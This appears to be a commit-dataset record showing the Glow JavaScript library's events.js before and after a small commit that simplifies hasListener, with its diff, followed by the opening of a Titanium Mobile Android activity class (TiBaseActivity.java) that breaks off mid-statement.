(! event) { event = new glow.events.Event(); } else if ( event.constructor === Object ) { event = new glow.events.Event( event ) } for(var i = 0, len = items.length; i < len; i++){ callListeners(items[i], eventName, event); } return event; }; /** * Private method to callListeners * * */ function callListeners(item, eventName, event) { var objIdent = item[psuedoPrivateEventKey], listenersForEvent, returnVal; if(!objIdent){ return event; } if(!eventListeners[objIdent]){ return false; } listenersForEvent = eventListeners[objIdent][eventName]; if(!listenersForEvent){ return event; } listenersForEvent = listenersForEvent.slice(0); for(var i = 0, len = listenersForEvent.length; i < len; i++){ returnVal = listenersForEvent[i][0].call(listenersForEvent[i][1], event); if(returnVal === false){ event.preventDefault(); } } return event; } /** @name glow.events.removeAllListeners @function @param {Object[]} items Items to remove events from @description Removes all listeners attached to a given object. This removes not only listeners you added, but listeners others added too. 
For this reason it should only be used as part of a cleanup operation on objects that are about to be destroyed. Glow will call this by default on its own classes like NodeList and widgets. */ glow.events.removeAllListeners = function (items) { for(var i = 0, len = items.length; i < len; i++){ var objIdent = items[i][psuedoPrivateEventKey]; if(!objIdent){ return false; } else{ delete ( eventListeners[objIdent] ); } } return true; }; /** @name glow.events.removeListeners @function @param {Object[]} item Item to remove events from @decription Returns a list of events attached to the given item(s). widgets. */ glow.events.removeListeners = function (item, eventName, callback) { for(var i = 0, len = item.length; i < len; i++){ var objIdent = item[i][psuedoPrivateEventKey], listenersForEvent; if(!objIdent){ return false; } if(!eventListeners[objIdent]){ return false; } listenersForEvent = eventListeners[objIdent][eventName]; if(!listenersForEvent){ return false; } for(var i = 0, len = listenersForEvent.length; i < len; i++){ if(listenersForEvent[i][0] == callback){ listenersForEvent.splice(i, 1); break; } } } return true; }; /** @name glow.events.getListeners @function @param {Object[]} item Item to find events for @decription Removes listeners for given object, with the given name with the given thisVal. Glow will call this by default on its own classes like NodeList and widgets. */ glow.events.getListeners = function(item){ eventListeners; return false; }; /** @name glow.events.hasListener @function @param {Object[]} item Item to find events for @param {String} eventName Name of the event to match @decription Returns true if an event is found for the item supplied */ glow.events.hasListener = function (item, eventName) { for(var i = 0, len = item.length; i < len; i++){ var objIdent = item[i][psuedoPrivateEventKey], listenersForEvent; if(!objIdent){ return false; } if(!eventListeners[objIdent]){ return false; } listenersForEvent = eventListeners[objIdent][eventName]; if(!listenersForEvent){ return false; } else{ return true; } } return false; }; /** @name glow.events.Target @class @description An object that can have event listeners and fire events. This is a base class for objects that can fire events. You can extend this class to make your own objects have 'on' and 'fire' methods. @example // Ball is our constructor function Ball() { // ... } // make Ball inherit from Target glow.lang.extend(Ball, glow.events.Target, { // additional methods for Ball here, eg: bowl: function() { // ... } }); // now instances of Ball can receive event listeners var myBall = new Ball(); myBall.on('bounce', function() { alert('BOING!'); }); // and events can be fired from Ball instances myBall.fire('bounce'); */ glow.events.Target = function () { }; /** @name glow.events.Target.extend @function @param {Object} obj Object to add methods to @description Convenience method to add Target instance methods onto an object. If you want to add events to a class, extend glow.events.Target instead. @example // myApplication is a singleton var myApplication = {}; glow.events.Target.extend(myApplication); // now myApplication can fire events... 
myApplication.fire('load'); // and other objects can listen for those events myApplication.on('load', function(e) { alert('App loaded'); }); */ glow.events.Target.extend = function (obj) { glow.lang.apply( obj, glow.events.Target.prototype ); }; /** @name glow.events.Target#on @function @param {String} eventName Name of the event to listen for @param {Function} callback Function to call when the event fires. The callback is passed a single event object. The type of this object depends on the event (see documentation for the event you're listening to). @param {Object} [thisVal] Value of 'this' within the callback. By default, this is the object being listened to. @description Listen for an event @returns this @example myObj.on('show', function() { // do stuff }); */ glow.events.Target.prototype.on = function(eventName, callback, thisVal) { glow.events.addListeners([this], eventName, callback, thisVal); } /** @name glow.events.Target#detach @function @param {String} eventName Name of the event to listen for @param {Function} callback Callback to detach @param {Object} [thisVal] Value of 'this' within the callback. By default, this is the object being listened to. @description Remove an event listener @returns this @example function showListener() { // ... } // add listener myObj.on('show', showListener); // remove listener myObj.detach('show', showListener); @example // note the following WILL NOT WORK // add listener myObj.on('show', function() { alert('hi'); }); // remove listener myObj.detach('show', function() { alert('hi'); }); // this is because both callbacks are different function instances // YUI do it more like this: // add listener var listenerHandle = myObj.on('show', function() { alert('hi'); }); // remove listener listenerHandle.detach(); // the problem here is we lose chaining */ glow.events.Target.prototype.detach = function(eventName, callback) { glow.events.removeListeners(this, eventName, callback); } /** @name glow.events.Target#fire @function @param {String} eventName Name of the event to fire @param {glow.events.Event|Object} [event] Event object to pass into listeners. You can provide a simple object of key / value pairs which will be added as properties of a glow.events.Event instance. @description Fire an event @returns glow.events.Event @example myObj.fire('show'); @example // adding properties to the event object myBall.fire('bounce', { velocity: 30 }); @example // BallBounceEvent extends glow.events.Event but has extra methods myBall.fire( 'bounce', new BallBounceEvent(myBall) ); */ glow.events.Target.prototype.fire = function(eventName, event) { return callListeners(this, eventName, event); } /** @name glow.events.Event @class @param {Object} [properties] Properties to add to the Event instance. Each key-value pair in the object will be added to the Event as properties @description Describes an event that occurred You don't need to create instances of this class if you're simply listening to events. One will be provided as the first argument in your callback. @example // creating a simple event object var event = new glow.events.Event({ velocity: 50, direction: 180 }); // 'velocity' and 'direction' are simple made-up properties // you may want to add to your event object @example // inheriting from glow.events.Event to make a more // specialised event object function RocketEvent() { // ... } // inherit from glow.events.Event glow.lang.extend(RocketEvent, glow.events.Event, { getVector: function() { return // ... 
} }); // firing the event rocketInstance.fire( 'landingGearDown', new RocketEvent() ); // how a user would listen to the event rocketInstance.on('landingGearDown', function(rocketEvent) { var vector = rocketEvent.getVector(); }); */ glow.events.Event = function ( obj ) { if(obj) { glow.lang.apply(this, obj); } }; /** @name glow.events.Event#attachedTo @type {Object} @description The object the listener was attached to. If null, this value will be populated by {@link glow.events.Target#fire} */ /** @name glow.events.Event#source @type Element @description The actual object/element that the event originated from. For example, you could attach a listener to an 'ol' element to listen for clicks. If the user clicked on an 'li' the source property would be the 'li' element, and 'attachedTo' would be the 'ol'. */ /** @name glow.events.Event#preventDefault @function @description Prevent the default action of the event. Eg, if the click event on a link is cancelled, the link is not followed. Returning false from an event listener has the same effect as calling this function. For custom events, it's down to whatever fired the event to decide what to do in this case. See {@link glow.events.Event#defaultPrevented defaultPrevented} @example myLinks.on('click', function(event) { event.preventDefault(); }); // same as... myLinks.on('click', function(event) { return false; }); */ glow.events.Event.prototype.preventDefault = function () { if (this[psuedoPreventDefaultKey]) { return; } this[psuedoPreventDefaultKey] = true; if (this.nativeEvent && this.nativeEvent.preventDefault) { this.nativeEvent.preventDefault(); this.nativeEvent.returnValue = false; } }; /** @name glow.events.Event#defaultPrevented @function @description Has the default been prevented for this event? This should be used by whatever fires the event to determine if it should carry out of the default action. @returns {Boolean} Returns true if {@link glow.events.Event#preventDefault preventDefault} has been called for this event. @example // fire the 'show' event // read if the default action has been prevented if ( overlayInstance.fire('show').defaultPrevented() == false ) { // go ahead and show } */ glow.events.Event.prototype.defaultPrevented = function () { return !! this[psuedoPreventDefaultKey]; }; /** @name glow.events.Event#stopPropagation @function @description Stops the event propagating. For DOM events, this stops the event bubbling up through event listeners added to parent elements. The event object is marked as having had propagation stopped (see {@link glow.events.Event#propagationStopped propagationStopped}). @example // catch all click events that are not links glow.events.addListener( document, 'click', function () { alert('document clicked'); } ); glow.events.addListener( 'a', 'click', function (e) { e.stopPropagation(); } ); */ glow.events.Event.prototype.stopPropagation = function () { if (this[psuedoStopPropagationKey]) { return; } this[psuedoStopPropagationKey] = true; var e = this.nativeEvent; if (e) { e.cancelBubble = true; if (e.stopPropagation) { e.stopPropagation(); } } }; /** @name glow.events.Event#propagationStopped @function @description Tests if propagation has been stopped for this event. @returns {Boolean} True if event propagation has been prevented. */ glow.events.Event.prototype.propagationStopped = function () { return !! this[psuedoStopPropagationKey]; }; } });
src/events/events.js
/** @name glow.events @namespace @description Native browser and custom events */ //----------------------------------------------------------------- Glow.provide({ version: '@SRC@', builder: function(glow) { glow.events = glow.events || {}; /* storage variables */ var r = {}; var eventListeners = {}; var eventid = 1; var objid = 1; var psuedoPrivateEventKey = '__eventId' + glow.UID; var psuedoPreventDefaultKey = psuedoPrivateEventKey + 'PreventDefault'; var psuedoStopPropagationKey = psuedoPrivateEventKey + 'StopPropagation'; /** @name glow.events.addListeners @function @param {Object[]} attachTo Array of objects to add listeners to @param {String} name Name of the event to listen for @param {Function} callback Function to call when the event fires. The callback is passed a single event object. The type of this object depends on the event (see documentation for the event you're listening to). @param {Object} [thisVal] Value of 'this' within the callback. By default, this is the object being listened to. @description Convenience method to add listeners to many objects at once. If you're wanting to add a listener to a single object, use its 'on' method. */ glow.events.addListeners = function (attachTo, name, callback, thisVal) { var listenerIds = [], i = attachTo.length, objIdent, listener, eventsOnObject, currentListeners; //attach the event for each element, return an array of listener ids while (i--) { objIdent = attachTo[i][psuedoPrivateEventKey]; if (!objIdent){ objIdent = attachTo[i][psuedoPrivateEventKey] = objid++; } listener = [ callback, thisVal || attachTo[i] ]; eventsOnObject = eventListeners[objIdent]; if(!eventsOnObject){ eventsOnObject = eventListeners[objIdent] = {}; } currentListeners = eventsOnObject[name]; if(!currentListeners){ currentListeners = eventsOnObject[name] = [listener]; } else{ currentListeners[currentListeners.length] = listener; } } }; /** @name glow.events.fire @function @param {Object[]} items Array of objects to add listeners to @param {String} eventName Name of the event to fire @param {glow.events.Event|Object} [event] Event object to pass into listeners. You can provide a simple object of key / value pairs which will be added as properties of a glow.events.Event instance. @description Convenience method to fire events on multiple items at once. If you're wanting to fire events on a single object, use its 'fire' method. */ glow.events.fire = function (items, eventName, event) { if (! event) { event = new glow.events.Event(); } else if ( event.constructor === Object ) { event = new glow.events.Event( event ) } for(var i = 0, len = items.length; i < len; i++){ callListeners(items[i], eventName, event); } return event; }; /** * Private method to callListeners * * */ function callListeners(item, eventName, event) { var objIdent = item[psuedoPrivateEventKey], listenersForEvent, returnVal; if(!objIdent){ return event; } if(!eventListeners[objIdent]){ return false; } listenersForEvent = eventListeners[objIdent][eventName]; if(!listenersForEvent){ return event; } listenersForEvent = listenersForEvent.slice(0); for(var i = 0, len = listenersForEvent.length; i < len; i++){ returnVal = listenersForEvent[i][0].call(listenersForEvent[i][1], event); if(returnVal === false){ event.preventDefault(); } } return event; } /** @name glow.events.removeAllListeners @function @param {Object[]} items Items to remove events from @description Removes all listeners attached to a given object. This removes not only listeners you added, but listeners others added too. 
For this reason it should only be used as part of a cleanup operation on objects that are about to be destroyed. Glow will call this by default on its own classes like NodeList and widgets. */ glow.events.removeAllListeners = function (items) { for(var i = 0, len = items.length; i < len; i++){ var objIdent = items[i][psuedoPrivateEventKey]; if(!objIdent){ return false; } else{ delete ( eventListeners[objIdent] ); } } return true; }; /** @name glow.events.removeListeners @function @param {Object[]} item Item to remove events from @decription Returns a list of events attached to the given item(s). widgets. */ glow.events.removeListeners = function (item, eventName, callback) { for(var i = 0, len = item.length; i < len; i++){ var objIdent = item[i][psuedoPrivateEventKey], listenersForEvent; if(!objIdent){ return false; } if(!eventListeners[objIdent]){ return false; } listenersForEvent = eventListeners[objIdent][eventName]; if(!listenersForEvent){ return false; } for(var i = 0, len = listenersForEvent.length; i < len; i++){ if(listenersForEvent[i][0] == callback){ listenersForEvent.splice(i, 1); break; } } } return true; }; /** @name glow.events.getListeners @function @param {Object[]} item Item to find events for @decription Removes listeners for given object, with the given name with the given thisVal. Glow will call this by default on its own classes like NodeList and widgets. */ glow.events.getListeners = function(item){ eventListeners; return false; }; /** @name glow.events.hasListener @function @param {Object[]} item Item to find events for @param {String} eventName Name of the event to match @decription Returns true if an event is found for the item supplied */ glow.events.hasListener = function (item, eventName) { for(var i = 0, len = item.length; i < len; i++){ var objIdent = item[i][psuedoPrivateEventKey], listenersForEvent; if(!objIdent){ return false; } if(!eventListeners[objIdent]){ return false; } listenersForEvent = eventListeners[objIdent][eventName]; if(!listenersForEvent){ return false; } for(var i = 0, len = listenersForEvent.length; i < len; i++){ return true; } } return false; }; /** @name glow.events.Target @class @description An object that can have event listeners and fire events. This is a base class for objects that can fire events. You can extend this class to make your own objects have 'on' and 'fire' methods. @example // Ball is our constructor function Ball() { // ... } // make Ball inherit from Target glow.lang.extend(Ball, glow.events.Target, { // additional methods for Ball here, eg: bowl: function() { // ... } }); // now instances of Ball can receive event listeners var myBall = new Ball(); myBall.on('bounce', function() { alert('BOING!'); }); // and events can be fired from Ball instances myBall.fire('bounce'); */ glow.events.Target = function () { }; /** @name glow.events.Target.extend @function @param {Object} obj Object to add methods to @description Convenience method to add Target instance methods onto an object. If you want to add events to a class, extend glow.events.Target instead. @example // myApplication is a singleton var myApplication = {}; glow.events.Target.extend(myApplication); // now myApplication can fire events... 
myApplication.fire('load'); // and other objects can listen for those events myApplication.on('load', function(e) { alert('App loaded'); }); */ glow.events.Target.extend = function (obj) { glow.lang.apply( obj, glow.events.Target.prototype ); }; /** @name glow.events.Target#on @function @param {String} eventName Name of the event to listen for @param {Function} callback Function to call when the event fires. The callback is passed a single event object. The type of this object depends on the event (see documentation for the event you're listening to). @param {Object} [thisVal] Value of 'this' within the callback. By default, this is the object being listened to. @description Listen for an event @returns this @example myObj.on('show', function() { // do stuff }); */ glow.events.Target.prototype.on = function(eventName, callback, thisVal) { glow.events.addListeners([this], eventName, callback, thisVal); } /** @name glow.events.Target#detach @function @param {String} eventName Name of the event to listen for @param {Function} callback Callback to detach @param {Object} [thisVal] Value of 'this' within the callback. By default, this is the object being listened to. @description Remove an event listener @returns this @example function showListener() { // ... } // add listener myObj.on('show', showListener); // remove listener myObj.detach('show', showListener); @example // note the following WILL NOT WORK // add listener myObj.on('show', function() { alert('hi'); }); // remove listener myObj.detach('show', function() { alert('hi'); }); // this is because both callbacks are different function instances // YUI do it more like this: // add listener var listenerHandle = myObj.on('show', function() { alert('hi'); }); // remove listener listenerHandle.detach(); // the problem here is we lose chaining */ glow.events.Target.prototype.detach = function(eventName, callback) { glow.events.removeListeners(this, eventName, callback); } /** @name glow.events.Target#fire @function @param {String} eventName Name of the event to fire @param {glow.events.Event|Object} [event] Event object to pass into listeners. You can provide a simple object of key / value pairs which will be added as properties of a glow.events.Event instance. @description Fire an event @returns glow.events.Event @example myObj.fire('show'); @example // adding properties to the event object myBall.fire('bounce', { velocity: 30 }); @example // BallBounceEvent extends glow.events.Event but has extra methods myBall.fire( 'bounce', new BallBounceEvent(myBall) ); */ glow.events.Target.prototype.fire = function(eventName, event) { return callListeners(this, eventName, event); } /** @name glow.events.Event @class @param {Object} [properties] Properties to add to the Event instance. Each key-value pair in the object will be added to the Event as properties @description Describes an event that occurred You don't need to create instances of this class if you're simply listening to events. One will be provided as the first argument in your callback. @example // creating a simple event object var event = new glow.events.Event({ velocity: 50, direction: 180 }); // 'velocity' and 'direction' are simple made-up properties // you may want to add to your event object @example // inheriting from glow.events.Event to make a more // specialised event object function RocketEvent() { // ... } // inherit from glow.events.Event glow.lang.extend(RocketEvent, glow.events.Event, { getVector: function() { return // ... 
} }); // firing the event rocketInstance.fire( 'landingGearDown', new RocketEvent() ); // how a user would listen to the event rocketInstance.on('landingGearDown', function(rocketEvent) { var vector = rocketEvent.getVector(); }); */ glow.events.Event = function ( obj ) { if(obj) { glow.lang.apply(this, obj); } }; /** @name glow.events.Event#attachedTo @type {Object} @description The object the listener was attached to. If null, this value will be populated by {@link glow.events.Target#fire} */ /** @name glow.events.Event#source @type Element @description The actual object/element that the event originated from. For example, you could attach a listener to an 'ol' element to listen for clicks. If the user clicked on an 'li' the source property would be the 'li' element, and 'attachedTo' would be the 'ol'. */ /** @name glow.events.Event#preventDefault @function @description Prevent the default action of the event. Eg, if the click event on a link is cancelled, the link is not followed. Returning false from an event listener has the same effect as calling this function. For custom events, it's down to whatever fired the event to decide what to do in this case. See {@link glow.events.Event#defaultPrevented defaultPrevented} @example myLinks.on('click', function(event) { event.preventDefault(); }); // same as... myLinks.on('click', function(event) { return false; }); */ glow.events.Event.prototype.preventDefault = function () { if (this[psuedoPreventDefaultKey]) { return; } this[psuedoPreventDefaultKey] = true; if (this.nativeEvent && this.nativeEvent.preventDefault) { this.nativeEvent.preventDefault(); this.nativeEvent.returnValue = false; } }; /** @name glow.events.Event#defaultPrevented @function @description Has the default been prevented for this event? This should be used by whatever fires the event to determine if it should carry out of the default action. @returns {Boolean} Returns true if {@link glow.events.Event#preventDefault preventDefault} has been called for this event. @example // fire the 'show' event // read if the default action has been prevented if ( overlayInstance.fire('show').defaultPrevented() == false ) { // go ahead and show } */ glow.events.Event.prototype.defaultPrevented = function () { return !! this[psuedoPreventDefaultKey]; }; /** @name glow.events.Event#stopPropagation @function @description Stops the event propagating. For DOM events, this stops the event bubbling up through event listeners added to parent elements. The event object is marked as having had propagation stopped (see {@link glow.events.Event#propagationStopped propagationStopped}). @example // catch all click events that are not links glow.events.addListener( document, 'click', function () { alert('document clicked'); } ); glow.events.addListener( 'a', 'click', function (e) { e.stopPropagation(); } ); */ glow.events.Event.prototype.stopPropagation = function () { if (this[psuedoStopPropagationKey]) { return; } this[psuedoStopPropagationKey] = true; var e = this.nativeEvent; if (e) { e.cancelBubble = true; if (e.stopPropagation) { e.stopPropagation(); } } }; /** @name glow.events.Event#propagationStopped @function @description Tests if propagation has been stopped for this event. @returns {Boolean} True if event propagation has been prevented. */ glow.events.Event.prototype.propagationStopped = function () { return !! this[psuedoStopPropagationKey]; }; } });
simplified hasListener slightly
src/events/events.js
simplified hasListener slightly
<ide><path>rc/events/events.js <ide> listenersForEvent = eventListeners[objIdent][eventName]; <ide> if(!listenersForEvent){ <ide> return false; <del> } <del> <del> for(var i = 0, len = listenersForEvent.length; i < len; i++){ <del> <del> return true; <del> <del> <del> } <del> <add> } <add> else{ <add> return true; <add> } <ide> } <ide> <ide> return false;
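The diff above simplifies hasListener so that merely finding a registered listener list for the event name is enough to return true, with no per-entry loop. As a rough, language-neutral illustration of that registry check (sketched in Java, the primary language of this dataset, rather than the JavaScript of the record above; the class and method names below are hypothetical and belong to neither codebase):

import java.util.*;

// Hypothetical sketch of the listener-registry pattern the diff touches:
// a non-empty list stored under an event name is sufficient evidence that
// a listener exists, so hasListener needs no loop over the entries.
class ListenerRegistry {
    private final Map<String, List<Runnable>> listeners = new HashMap<>();

    void on(String eventName, Runnable callback) {
        listeners.computeIfAbsent(eventName, k -> new ArrayList<>()).add(callback);
    }

    boolean hasListener(String eventName) {
        List<Runnable> forEvent = listeners.get(eventName);
        return forEvent != null && !forEvent.isEmpty();
    }

    void fire(String eventName) {
        List<Runnable> forEvent = listeners.get(eventName);
        if (forEvent == null) {
            return;
        }
        // Copy first so callbacks may detach themselves while the event fires.
        for (Runnable callback : new ArrayList<>(forEvent)) {
            callback.run();
        }
    }
}

// Usage sketch: registry.on("bounce", () -> System.out.println("BOING!"));
// registry.hasListener("bounce") then returns true without iterating callbacks.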
Java
apache-2.0
e0c264971e20f3e8e25ade24abac84ee56bfc424
0
mano-mykingdom/titanium_mobile,mano-mykingdom/titanium_mobile,mano-mykingdom/titanium_mobile,mano-mykingdom/titanium_mobile,mano-mykingdom/titanium_mobile,mano-mykingdom/titanium_mobile,mano-mykingdom/titanium_mobile,mano-mykingdom/titanium_mobile
/** * Appcelerator Titanium Mobile * Copyright (c) 2009-2014 by Appcelerator, Inc. All Rights Reserved. * Licensed under the terms of the Apache Public License * Please see the LICENSE included with this distribution for details. */ package org.appcelerator.titanium; import java.lang.ref.WeakReference; import java.util.ArrayList; import java.util.Iterator; import java.util.List; import java.util.Stack; import java.util.concurrent.ConcurrentHashMap; import java.util.concurrent.CopyOnWriteArrayList; import org.appcelerator.kroll.KrollDict; import org.appcelerator.kroll.KrollFunction; import org.appcelerator.kroll.KrollObject; import org.appcelerator.kroll.KrollProxy; import org.appcelerator.kroll.KrollRuntime; import org.appcelerator.kroll.common.Log; import org.appcelerator.kroll.common.TiMessenger; import org.appcelerator.titanium.TiLifecycle.OnLifecycleEvent; import org.appcelerator.titanium.TiLifecycle.OnWindowFocusChangedEvent; import org.appcelerator.titanium.TiLifecycle.interceptOnBackPressedEvent; import org.appcelerator.titanium.TiLifecycle.OnActivityResultEvent; import org.appcelerator.titanium.TiLifecycle.OnInstanceStateEvent; import org.appcelerator.titanium.TiLifecycle.OnCreateOptionsMenuEvent; import org.appcelerator.titanium.TiLifecycle.OnPrepareOptionsMenuEvent; import org.appcelerator.titanium.proxy.ActionBarProxy; import org.appcelerator.titanium.proxy.ActivityProxy; import org.appcelerator.titanium.proxy.IntentProxy; import org.appcelerator.titanium.proxy.TiViewProxy; import org.appcelerator.titanium.proxy.TiWindowProxy; import org.appcelerator.titanium.util.TiActivityResultHandler; import org.appcelerator.titanium.util.TiActivitySupport; import org.appcelerator.titanium.util.TiActivitySupportHelper; import org.appcelerator.titanium.util.TiConvert; import org.appcelerator.titanium.util.TiMenuSupport; import org.appcelerator.titanium.util.TiPlatformHelper; import org.appcelerator.titanium.util.TiUIHelper; import org.appcelerator.titanium.util.TiWeakList; import org.appcelerator.titanium.view.TiCompositeLayout; import org.appcelerator.titanium.view.TiCompositeLayout.LayoutArrangement; import android.app.Activity; import android.support.v7.app.AppCompatActivity; import android.app.Dialog; import android.content.Intent; import android.content.IntentSender; import android.content.pm.ActivityInfo; import android.content.pm.PackageManager; import android.content.res.Configuration; import android.graphics.PixelFormat; import android.hardware.SensorManager; import android.os.Build; import android.os.Bundle; import android.os.Message; import android.os.Messenger; import android.os.RemoteException; import android.util.DisplayMetrics; import android.view.KeyEvent; import android.view.Menu; import android.view.MenuItem; import android.view.OrientationEventListener; import android.view.Surface; import android.view.View; import android.view.Window; import android.view.WindowManager; import android.view.ViewGroup.LayoutParams; import com.appcelerator.aps.APSAnalytics; /** * The base class for all non tab Titanium activities. To learn more about Activities, see the * <a href="http://developer.android.com/reference/android/app/Activity.html">Android Activity documentation</a>. 
*/ public abstract class TiBaseActivity extends AppCompatActivity implements TiActivitySupport/*, ITiWindowHandler*/ { private static final String TAG = "TiBaseActivity"; private static OrientationChangedListener orientationChangedListener = null; private OrientationEventListener orientationListener; private boolean onDestroyFired = false; private int originalOrientationMode = -1; private boolean inForeground = false; // Indicates whether this activity is in foreground or not. private TiWeakList<OnLifecycleEvent> lifecycleListeners = new TiWeakList<OnLifecycleEvent>(); private TiWeakList<OnWindowFocusChangedEvent> windowFocusChangedListeners = new TiWeakList<OnWindowFocusChangedEvent>(); private TiWeakList<interceptOnBackPressedEvent> interceptOnBackPressedListeners = new TiWeakList<interceptOnBackPressedEvent>(); private TiWeakList<OnInstanceStateEvent> instanceStateListeners = new TiWeakList<OnInstanceStateEvent>(); private TiWeakList<OnActivityResultEvent> onActivityResultListeners = new TiWeakList<OnActivityResultEvent>(); private TiWeakList<OnCreateOptionsMenuEvent> onCreateOptionsMenuListeners = new TiWeakList<OnCreateOptionsMenuEvent>(); private TiWeakList<OnPrepareOptionsMenuEvent> onPrepareOptionsMenuListeners = new TiWeakList<OnPrepareOptionsMenuEvent>(); private APSAnalytics analytics = APSAnalytics.getInstance(); public static class PermissionContextData { private final Integer requestCode; private final KrollObject context; private final KrollFunction callback; public PermissionContextData(Integer requestCode, KrollFunction callback, KrollObject context) { this.requestCode = requestCode; this.callback = callback; this.context = context; } public Integer getRequestCode() { return requestCode; } public KrollFunction getCallback() { return callback; } public KrollObject getContext() { return context; } } private static ConcurrentHashMap<Integer,PermissionContextData> callbackDataByPermission = new ConcurrentHashMap<Integer, PermissionContextData>(); protected View layout; protected TiActivitySupportHelper supportHelper; protected int supportHelperId = -1; protected TiWindowProxy window; protected TiViewProxy view; protected ActivityProxy activityProxy; protected TiWeakList<ConfigurationChangedListener> configChangedListeners = new TiWeakList<ConfigurationChangedListener>(); protected int orientationDegrees; protected TiMenuSupport menuHelper; protected Messenger messenger; protected int msgActivityCreatedId = -1; protected int msgId = -1; protected static int previousOrientation = -1; //Storing the activity's dialogs and their persistence private CopyOnWriteArrayList<DialogWrapper> dialogs = new CopyOnWriteArrayList<DialogWrapper>(); private Stack<TiWindowProxy> windowStack = new Stack<TiWindowProxy>(); public TiWindowProxy lwWindow; public boolean isResumed = false; private boolean overridenLayout; public class DialogWrapper { boolean isPersistent; Dialog dialog; WeakReference<TiBaseActivity> dialogActivity; public DialogWrapper(Dialog d, boolean persistent, WeakReference<TiBaseActivity> activity) { isPersistent = persistent; dialog = d; dialogActivity = activity; } public TiBaseActivity getActivity() { if (dialogActivity == null) { return null; } else { return dialogActivity.get(); } } public void setActivity(WeakReference<TiBaseActivity> da) { dialogActivity = da; } public Dialog getDialog() { return dialog; } public void setDialog(Dialog d) { dialog = d; } public void release() { dialog = null; dialogActivity = null; } public boolean getPersistent() { return isPersistent; } 
public void setPersistent(boolean p) { isPersistent = p; } } public void addWindowToStack(TiWindowProxy proxy) { if (windowStack.contains(proxy)) { Log.e(TAG, "Window already exists in stack", Log.DEBUG_MODE); return; } boolean isEmpty = windowStack.empty(); if (!isEmpty) { windowStack.peek().onWindowFocusChange(false); } windowStack.add(proxy); if (!isEmpty) { proxy.onWindowFocusChange(true); } } public void removeWindowFromStack(TiWindowProxy proxy) { proxy.onWindowFocusChange(false); boolean isTopWindow = ( (!windowStack.isEmpty()) && (windowStack.peek() == proxy) ) ? true : false; windowStack.remove(proxy); //Fire focus only if activity is not paused and the removed window was topWindow if (!windowStack.empty() && isResumed && isTopWindow) { TiWindowProxy nextWindow = windowStack.peek(); nextWindow.onWindowFocusChange(true); } } /** * Returns the window at the top of the stack. * @return the top window or null if the stack is empty. */ public TiWindowProxy topWindowOnStack() { return (windowStack.isEmpty()) ? null : windowStack.peek(); } // could use a normal ConfigurationChangedListener but since only orientation changes are // forwarded, create a separate interface in order to limit scope and maintain clarity public static interface OrientationChangedListener { public void onOrientationChanged (int configOrientationMode, int width, int height); } public static void registerOrientationListener (OrientationChangedListener listener) { orientationChangedListener = listener; } public static void deregisterOrientationListener() { orientationChangedListener = null; } public static interface ConfigurationChangedListener { public void onConfigurationChanged(TiBaseActivity activity, Configuration newConfig); } /** * @return the instance of TiApplication. */ public TiApplication getTiApp() { return (TiApplication) getApplication(); } /** * @return the window proxy associated with this activity. */ public TiWindowProxy getWindowProxy() { return this.window; } /** * Sets the window proxy. * @param proxy */ public void setWindowProxy(TiWindowProxy proxy) { this.window = proxy; } /** * Sets the proxy for our layout (used for post layout event) * * @param proxy */ public void setLayoutProxy(TiViewProxy proxy) { if (layout instanceof TiCompositeLayout) { ((TiCompositeLayout) layout).setProxy(proxy); } } /** * Sets the view proxy. * @param proxy */ public void setViewProxy(TiViewProxy proxy) { this.view = proxy; } /** * @return activity proxy associated with this activity. */ public ActivityProxy getActivityProxy() { return activityProxy; } public void addDialog(DialogWrapper d) { if (!dialogs.contains(d)) { dialogs.add(d); } } public void removeDialog(Dialog d) { for (int i = 0; i < dialogs.size(); i++) { DialogWrapper p = dialogs.get(i); if (p.getDialog().equals(d)) { p.release(); dialogs.remove(i); return; } } } public void setActivityProxy(ActivityProxy proxy) { this.activityProxy = proxy; } /** * @return the activity's current layout. 
*/ public View getLayout() { return layout; } public void setLayout(View layout) { this.layout = layout; } public void addConfigurationChangedListener(ConfigurationChangedListener listener) { configChangedListeners.add(new WeakReference<ConfigurationChangedListener>(listener)); } public void removeConfigurationChangedListener(ConfigurationChangedListener listener) { configChangedListeners.remove(listener); } public void registerOrientationChangedListener (OrientationChangedListener listener) { orientationChangedListener = listener; } public void deregisterOrientationChangedListener() { orientationChangedListener = null; } protected boolean getIntentBoolean(String property, boolean defaultValue) { Intent intent = getIntent(); if (intent != null) { if (intent.hasExtra(property)) { return intent.getBooleanExtra(property, defaultValue); } } return defaultValue; } protected int getIntentInt(String property, int defaultValue) { Intent intent = getIntent(); if (intent != null) { if (intent.hasExtra(property)) { return intent.getIntExtra(property, defaultValue); } } return defaultValue; } protected String getIntentString(String property, String defaultValue) { Intent intent = getIntent(); if (intent != null) { if (intent.hasExtra(property)) { return intent.getStringExtra(property); } } return defaultValue; } protected void updateTitle() { if (window == null) return; if (window.hasProperty(TiC.PROPERTY_TITLE)) { String oldTitle = (String) getTitle(); String newTitle = TiConvert.toString(window.getProperty(TiC.PROPERTY_TITLE)); if (oldTitle == null) { oldTitle = ""; } if (newTitle == null) { newTitle = ""; } if (!newTitle.equals(oldTitle)) { final String fnewTitle = newTitle; runOnUiThread(new Runnable(){ public void run() { setTitle(fnewTitle); } }); } } } // Subclasses can override to provide a custom layout protected View createLayout() { LayoutArrangement arrangement = LayoutArrangement.DEFAULT; String layoutFromIntent = getIntentString(TiC.INTENT_PROPERTY_LAYOUT, ""); if (layoutFromIntent.equals(TiC.LAYOUT_HORIZONTAL)) { arrangement = LayoutArrangement.HORIZONTAL; } else if (layoutFromIntent.equals(TiC.LAYOUT_VERTICAL)) { arrangement = LayoutArrangement.VERTICAL; } // set to null for now, this will get set correctly in setWindowProxy() return new TiCompositeLayout(this, arrangement, null); } @Override public void onRequestPermissionsResult(int requestCode, String permissions[], int[] grantResults) { if (!callbackDataByPermission.isEmpty()) { handlePermissionRequestResult(requestCode, permissions, grantResults); } } private void handlePermissionRequestResult(Integer requestCode, String[] permissions, int[] grantResults) { PermissionContextData cbd = callbackDataByPermission.get(requestCode); if (cbd == null) { return; } String deniedPermissions = ""; for (int i = 0; i < grantResults.length; ++i) { if (grantResults[i] == PackageManager.PERMISSION_DENIED) { if (deniedPermissions.isEmpty()) { deniedPermissions = permissions[i]; } else { deniedPermissions = deniedPermissions + ", " + permissions[i]; } } } KrollDict response = new KrollDict(); if (deniedPermissions.isEmpty()) { response.putCodeAndMessage(0, null); } else { response.putCodeAndMessage(-1, "Permission(s) denied: " + deniedPermissions); } KrollFunction callback = cbd.getCallback(); if (callback != null) { KrollObject context = cbd.getContext(); if (context == null) { Log.w(TAG, "Permission callback context object is null"); } callback.callAsync(context, 